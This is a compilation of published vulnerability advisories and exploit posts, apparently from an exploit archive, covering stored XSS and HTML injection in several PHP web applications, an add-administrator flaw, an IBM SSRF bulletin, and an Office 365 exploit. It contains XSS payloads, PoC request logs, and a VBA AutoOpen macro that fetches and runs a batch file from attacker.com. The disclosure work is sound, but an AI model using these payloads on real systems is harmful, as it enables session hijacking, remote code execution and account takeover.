Tiva Events Calender version 1.4 suffers from a persistent cross site scripting vulnerability.

Document Title:  
===============  
Tiva Events Calender v1.4 - Cross Site Scripting Vulnerability

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2276

Release Date:  
=============  
2023-07-05

Vulnerability Laboratory ID (VL-ID):  
====================================  
2276

Common Vulnerability Scoring System:  
====================================  
5

Vulnerability Class:  
====================  
Cross Site Scripting - Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
Events Calendar For PHP is a powerful PHP calendar script that can be easily integrated and used with various PHP projects,  
such as scheduler, event handler, etc. The calendar is simple to install, deploy, and use. It is suitable for all types of  
service businesses to get online reservations without any hassles.

(Copy of the Homepage:https://codecanyon.net/item/tiva-events-calendar-for-php/19199337  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a persistent script code inject vulnerability in the Tiva Events Calender v1.4 web-application.

Affected Product(s):  
====================  
tiva_theme  
Product: Tiva Events Calender - Calender PHP (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2021-04-03: Researcher Notification & Coordination (Security Researcher)  
2021-04-04: Vendor Notification 1 (Security Department)  
2021-06-24: Vendor Notification 2 (Security Department)  
2021-07-13: Vendor Notification 3 (Security Department)  
****-**-**: Vendor Response/Feedback (Security Department)  
****-**-**: Vendor Fix/Patch (Service Developer Team)  
****-**-**: Security Acknowledgements (Security Department)  
2023-07-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Restricted Authentication (User Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
A persistent input validation web vulnerability has been discovered in the official Tiva Events Calender v1.4 web-application.  
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser  
to web-application requests from the application-side.

The vulnerability is located in the name input field and name parameter. Remote attackers privileged user accounts are able to inject  
own malicious script codes as name. Thus results in a persistent execute of the script code in the backend on edit but as well in the  
frontend (index) were the event is being displayed after the submit (save) via post method request. In the same direction it is possible  
to inject malformed client-side executable script code in get request to trigger a non-persistent execution.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects  
to malicious source and persistent manipulation of affected frontend / backend application modules.

Request Method(s):  
[+] POST / GET

Vulnerable Input(s):  
[+] Name

Vulnerable Parameter(s):  
[+] name

Affected Module(s):  
[+] index.php (Frontend on Event Preview)  
[+] edit.php (Backend on Edit ID)

Proof of Concept (PoC):  
=======================  
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.  
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload  
%20"<img src="evil.source" onload=alert(document.domain)>

Vulnerable Source: Frontend (Index)  
<tr><td class="calendar-day-normal"><span class="calendar-day-weekend">8</span></td>  
<td class="calendar-day-normal"><div class="calendar-day-file">9<div class="calendar-file-name color-4" onclick="downloadFile(220)">  
<span class="event-name">event1"%20"<img src="evil.source" onload=alert(document.domain)></span></div></div></td><td class="calendar-day-normal">10</td>  
<td class="calendar-day-normal">11</td><td class="calendar-day-normal">12</td><td class="calendar-day-normal">13</td>  
<td class="calendar-day-normal"><span class="calendar-day-weekend">14</span></td></tr>

Vulnerable Source: Backend (Edit ID)  
<section class="panel">  
<header class="panel-heading"><i class="fa fa-folder-open"></i> Edit File</header>  
<div class="panel-body">  
<div class="alert alert-success">  
<button data-dismiss="alert" class="close close-sm" type="button">  
<i class="fa fa-times"></i>  
</button>Report successfully saved.</div>    
<form class="form-horizontal" action="edit.php?id=220" method="post" enctype="multipart/form-data">  
<div class="form-group">  
<label class="col-lg-2 col-sm-2 control-label">Name<span class="star">&nbsp;*</span></label>  
<div class="col-sm-8">  
<input type="text" name="name" class="form-control" value="event1"%20"<img src="evil.source" onload=alert(document.domain)>" required />  
</div></div>

--- PoC Session Logs (POST) ---  
https://tiva-cal.localhost:8080/admin/report/edit.php  
Host: tiva-cal.localhost:8080  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Content-Type: multipart/form-data; boundary=---------------------------249785717017581481612148649683  
Content-Length: 745  
Origin:https://tiva-cal.localhost:8080  
Connection: keep-alive  
Referer:https://tiva-cal.localhost:8080/admin/report/edit.php  
Cookie: PHPSESSID=76gqk14e1s6cce40hfj11  
name="%20%20"<img src="evil.source" onload=alert(document.domain)>&type=1&time=20-08-2021&file=temp.txt&save=  
-  
POST: HTTP/2.0 200 OK  
server: nginx  
content-type: text/html  
content-length: 1283  
etag: "503-53ed12f4ca761"  
accept-ranges: bytes  
strict-transport-security: max-age=15768000; includeSubDomains  
-  
https://tiva-cal.localhost:8080/admin/report/evil.source  
Host: tiva-cal.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: image/webp,*/*  
Connection: keep-alive  
Referer:https://tiva-cal.localhost:8080/admin/report/edit.php?id=222  
Cookie: PHPSESSID=76gqk14e1s6cce40hfj11  
-  
GET: HTTP/2.0 200 OK  
server: nginx  
content-type: text/html  
content-length: 1283  
etag: "503-53ed12f4ca761"  
accept-ranges: bytes  
strict-transport-security: max-age=15768000; includeSubDomains

Solution - Fix & Patch:  
=======================  
The vulnerability can be patched by the following steps ...  
1. Encode and escape the name input field content on transmit via post method  
2. Restrict the input field and disallow insert of special chars  
3. Parse the output location on the index frontend via encode to sanitize and prevent the execute  
4. Parse the output location on the edit id report backend via encode to sanitize and prevent the execute

Security Risk:  
==============  
The security risk of the persistent input validation vulnerability in the web-application is estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Tiva Events Calender 1.4 Cross Site Scripting

Active Super Shop CMS version 2.5 suffers from an html injection vulnerability.

Document Title:  
===============  
Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2278

Release Date:  
=============  
2023-07-04

Vulnerability Laboratory ID (VL-ID):  
====================================  
2278

Common Vulnerability Scoring System:  
====================================  
5.4

Vulnerability Class:  
====================  
Script Code Injection

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application.

Affected Product(s):  
====================  
ActiveITzone  
Product: Active Super Shop CMS v2.5 (CMS) (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2021-08-20: Researcher Notification & Coordination (Security Researcher)  
2021-08-21: Vendor Notification (Security Department)  
2021-**-**: Vendor Response/Feedback (Security Department)  
2021-**-**: Vendor Fix/Patch (Service Developer Team)  
2021-**-**: Security Acknowledgements (Security Department)  
2023-07-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Restricted Authentication (User Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
Multiple html injection web vulnerabilities has been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application.  
The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content.

The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module.  
Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on  
profile view or products preview listing. There are 3 different privileges that are allowed to access the backend like the accountant (low privileges), the  
manager (medium privileges) or the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and manager on preview  
of the elements in the backend to compromise the application. The request method to inject is post and the attack vector is persistent located on the application-side.

Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and  
persistent manipulation of affected application modules.

Request Method(s):  
[+] POST

Vulnerable Module(s):  
[+] Manage Details

Vulnerable Parameter(s):  
[+] name  
[+] phone  
[+] address

Affected Module(s):  
[+] manage profile  
[+] products branding

Proof of Concept (PoC):  
=======================  
The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction.  
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload  
<img src="https://[DOMAIN]/[PATH]/[PICTURE].*">

Vulnerable Source: manage_admin & branding  
<div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;">  
<div class="panel-heading">  
<h3 class="panel-title">Manage Details</h3>  
</div>  
<form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/"  class="form-horizontal" method="post" accept-charset="utf-8">  
<div class="panel-body">  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-1">Name</label>  
<div class="col-sm-6">  
<input type="text" name="name" value="Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required">  
</div></div>  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-2">Email</label>  
<div class="col-sm-6">  
<input type="email" name="email" value="accountant@shop.com"  id="demo-hor-2" class="form-control required">  
</div></div>  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-3">  
Phone</label>  
<div class="col-sm-6">  
<input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control">  
</div></div>

--- PoC Session Logs (POST) ---  
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/  
Host: assm_cms.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html, */*; q=0.01  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680  
Content-Length: 902  
Origin:https://assm_cms.localhost:8080  
Connection: keep-alive  
Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/  
Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1  
-  
POST: HTTP/3.0 200 OK  
content-type: text/html; charset=UTF-8  
ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly  
https://assm_cms.localhost:8080/shop/admin/manage_admin/  
Host: assm_cms.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Connection: keep-alive

Reference(s):  
https://assm_cms.localhost:8080/shop/  
https://assm_cms.localhost:8080/shop/admin/  
https://assm_cms.localhost:8080/shop/admin/manage_admin/  
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/

Solution - Fix & Patch:  
=======================  
Disallow inseration of html code for input fields like name, adress and phone. Sanitize the content to secure deliver.

Security Risk:  
==============  
The security risk of the html injection web vulnerabilities in the shopping web-application are estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Active Super Shop CMS 2.5 HTML Injection

Boom CMS version 8.0.7 suffers from a cross site scripting vulnerability.

    Document Title:===============Boom CMS v8.0.7 - Cross Site Scripting VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2274Release Date:=============2023-07-03Vulnerability Laboratory ID (VL-ID):====================================2274Common Vulnerability Scoring System:====================================5.3Vulnerability Class:====================Cross Site Scripting - PersistentCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes lifeeasy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content.It gives editors control but doesn't require any technical knowledge.(Copy of the Homepage:https://www.boomcms.net/boom-boom  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application.Affected Product(s):====================UXB LondonProduct: Boom v8.0.7 - Content Management System (Web-Application)Vulnerability Disclosure Timeline:==================================2022-07-24: Researcher Notification & Coordination (Security Researcher)2022-07-25: Vendor Notification (Security Department)2023-**-**: Vendor Response/Feedback (Security Department)2023-**-**: Vendor Fix/Patch (Service Developer Team)2023-**-**: Security Acknowledgements (Security Department)2023-07-03: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (User Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Responsible DisclosureTechnical Details & Description:================================A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application.The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromisebrowser to web-application requests from the application-side.The vulnerability is located in the input fields of the album title and album description in the asset-manager module.Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description.After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets.The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parsethe content by usage of a backslash. Thus does not have any impact to inject own maliciousjava-scripts because of its only performed for double- and single-quotes to prevent sql injections.Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistentexternal redirects to malicious source and persistent manipulation of affected application modules.Request Method(s):[+] POSTVulnerable Module(s):[+] assets-manager (album)Vulnerable Function(s):[+] addVulnerable Parameter(s):[+] title[+] descriptionAffected Module(s):[+] Frontend (Albums)[+] Backend (Albums Assets)Proof of Concept (PoC):=======================The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.Manual steps to reproduce the vulnerability ...1. Login to the application as restricted user2. Create a new album3. Inject a test script code payload to title and description4. Save the request5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution6. Successful reproduce of the persistent cross site web vulnerability!Payload(s):><script>alert(document.cookie)</script><div style=1<a onmouseover=alert(document.cookie)>test</a>--- PoC Session Logs (Inject) ---https://localhost:8000/boomcms/album/35Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/jsonX-Requested-With: XMLHttpRequestContent-Length: 263Origin:https://localhost:8000Connection: keep-aliveReferer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source]Sec-Fetch-Site: same-origin{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>","slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by":null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"}-PUT: HTTP/1.1 200 OKServer: ApacheCache-Control: no-cache, privateSet-Cookie: Max-Age=7200; path=/Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;Max-Age=7200; path=/; httponlyContent-Length: 242Connection: Keep-AliveContent-Type: application/json-https://localhost:8000/boomcms/asset-manager/albums/[evil.source]Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brConnection: keep-aliveCookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;-GET: HTTP/1.1 200 OKServer: ApacheCache-Control: no-cache, privateSet-Cookie:Vary: Accept-EncodingContent-Length: 7866Connection: Keep-AliveContent-Type: text/html; charset=UTF-8-Vulnerable Source: asset-manager/albums/[ID]<li data-album="36">         <a href="#albums/20">             <div>                 <h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3>                 <p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>                 <p class='count'><span>0</span> assets</p>             </div>         </a>     </li></iframe></p></div></a></li></ul></div></div>         </div>         <div id="b-assets-view-asset-container"></div>         <div id="b-assets-view-selection-container"></div>         <div id="b-assets-view-album-container"><div><div id="b-assets-view-album">         <div class="heading">             <h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1>             <p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>         </div>Solution - Fix & Patch:=======================The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters.Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks.Security Risk:==============The security risk of the persistent input validation web vulnerability in the application is estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Boom CMS 8.0.7 Cross Site Scripting

Microsoft Office 365 version 18.2305.1222.0 suffers from a remote code execution vulnerability when a malicious link is clicked on in a Word file.

    ## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation ofPrivilege Vulnerability + RCE.## Author: nu11secur1ty## Date: 07.18.2023## Vendor: https://www.microsoft.com/## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office## Reference: https://portswigger.net/web-security/access-control## CVE-2023-33148## Description:The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable toElevation of Privilege.The attacker can use this vulnerability to attach a very maliciousWORD file in the Outlook app which is a part of Microsoft Office 365and easily can trick the victim to click on it - opening it andexecuting a very dangerous shell command, in the background of thelocal PC. This execution is without downloading this malicious file,and this is a potential problem and a very dangerous case! This can bethe end of the victim's PC, it depends on the scenario.WARNING! Office 365 executes files directly from Outlook, without tempdownloading, security checking and etc.## Staus: HIGH Vulnerability[+]Exploit:- - - NOTE:This exploit is connected to the third-party server, and when thevictim clicks on it and opens it the content of the script which isinside will fetch on the machine locally and execute himself by usingMS Office 365 and Outlook app which is a part of the 365 API.```vbSub AutoOpen()  Call Shell("cmd.exe /S /c" & "curl -shttps://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat&& .\salaries.bat", vbNormalFocus)End Sub```## Reproduce:[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)## Proof and Exploit[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)## Time spend:00:35:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ andhttps://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Microsoft Office 365 18.2305.1222.0 Remote Code Execution

Clip Share version 4.1.4 suffers from a cross site scripting vulnerability.

**Clip Share 4.1.4 Cross Site Scripting**

Posted Jul 19, 2023

Authored by indoushka

Clip Share version 4.1.4 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | f104b1e9de39e7d0bb70da284aab85d83380acd95357f1cdeaf43197d30dc724

Download | Favorite | View

**Clip Share 4.1.4 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Clip Share 4.1.4 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.clip-share.com/                                                                                         || # Dork      : Powered By ClipShare                                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Xss :   This vulnerability affects /ClipShare/signup.    URL encoded POST input username was set to xtqewoxj" onmouseover=prompt(993897) bad="   The input is reflected inside a tag parameter between double quotes.   URL encoded POST input email was set to sample%40email.tst" onmouseover=prompt(901680) bad="   The input is reflected inside a tag parameter between double quotes.Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,696)
*   Arbitrary (16,150)
*   BBS (2,859)
*   Bypass (1,732)
*   CGI (1,025)
*   Code Execution (7,233)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,333)
*   DoS (23,342)
*   Encryption (2,365)
*   Exploit (51,589)
*   File Inclusion (4,207)
*   File Upload (963)
*   Firewall (821)
*   Info Disclosure (2,752)
*   Intrusion Detection (890)
*   Java (3,009)
*   JavaScript (851)
*   Kernel (6,639)
*   Local (14,427)
*   Magazine (586)
*   Overflow (12,638)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,649)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,635)
*   Security Tool (7,873)
*   Shell (3,172)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,195)
*   SQL Injection (16,299)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,691)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,849)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,792)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,198)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,565)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,751)
*   UNIX (9,266)
*   UnixWare (186)
*   Windows (6,562)
*   Other

Clip Share 4.1.4 Cross Site Scripting

Ciuis CRM version 1.0.8 suffers from an add administrator vulnerability.

    ====================================================================================================================================| # Title     : Ciuis™ CRM v1.0.7 add administrator Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : https://codelist.cc/php-script/233000-ciuis-crm-v107.html                                                          || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] suffers from an add administrator vulnerability because after the first installation, the installation file repeats the installation process.[+] use payload 01 : /install/app/pages/complete.php  [+] use payload 02 : /install/app/pages/requirements.php [+] http://127.0.0.1/drmcrmcom/install/app/pages/complete.php   [+] http://127.0.0.1/drmcrmcom/install/app/pages/requirements.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Ciuis CRM 1.0.8 Add Administrator

IBM Sterling Connect:Express for UNIX 1.5 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.  IBM X-Force ID:  252135.

  

**Summary**

IBM Sterling Connect:Express for UNIX is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.

**Vulnerability Details**

**CVEID:**   CVE-2023-29260  
**DESCRIPTION:**   IBM Sterling Connect:Express for UNIX is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/252135 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

Sterling Connect:Express for UNIX

1.5.x

**Remediation/Fixes**

Upgrade to Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.12 available on Fix Central

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

11 Jul 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

